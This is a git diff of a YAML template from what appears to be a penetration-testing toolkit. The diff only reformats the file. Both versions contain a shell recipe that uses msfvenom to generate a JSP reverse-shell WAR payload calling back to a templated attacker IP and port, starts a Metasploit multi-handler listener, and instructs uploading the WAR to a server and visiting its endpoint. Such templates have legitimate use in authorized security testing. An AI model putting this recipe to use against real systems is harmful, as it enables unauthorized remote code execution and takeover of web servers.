--- a/src/profi/templates/scripts/deliver-jsp-msfvenom-revshell-nonstaged-war.yaml
+++ b/src/profi/templates/scripts/deliver-jsp-msfvenom-revshell-nonstaged-war.yaml
@@ -1,30 +1,17 @@
+---
 metadata:
-  filename: deliver-jsp-msfvenom-revshell-nonstaged-war.yaml
-  tags:
-  - web
-  - shell
-  - linux
-  created: '2025-03-29'
-  author: Unknown
-content: 'mkdir -p packstation/outbound; echo ''msfvenom creates the payload. Please
-  wait...''; \
+  filename: "deliver-jsp-msfvenom-revshell-nonstaged-war.yaml"
+  tags: ["web", "shell", "linux"]
+  created: "2025-03-29"
+  author: "Unknown"
 
-  msfvenom -p java/jsp_shell_reverse_tcp LHOST={{ attacker_ip }} LPORT={{ shell_port
-  }} -f war > packstation/outbound/revshell.war
-
-  echo ''================================================================''; \
-
-  echo ''                      ------Listener------                      ''; \
-
-  echo ''1. Start listener: {{ include(''scripts/listener-msf-multi-handler-linux-x64-meterpreter-nonstaged.yaml'')
-  }}''; \
-
-  echo ''================================================================''; \
-
-  echo ''                      ------Exploitation------                      ''; \
-
-  echo ''2. Upload WAR file and visit endpoint''; \
-
-  echo ''================================================================'';
-
-  '
+content: |
+  mkdir -p packstation/outbound; echo 'msfvenom creates the payload. Please wait...'; \
+  msfvenom -p java/jsp_shell_reverse_tcp LHOST={{ attacker_ip }} LPORT={{ shell_port }} -f war > packstation/outbound/revshell.war
+  echo '================================================================'; \
+  echo '                      ------Listener------                      '; \
+  echo '1. Start listener: {{ include('scripts/listener-msf-multi-handler-linux-x64-meterpreter-nonstaged.yaml') }}'; \
+  echo '================================================================'; \
+  echo '                      ------Exploitation------                      '; \
+  echo '2. Upload WAR file and visit endpoint'; \
+  echo '================================================================';
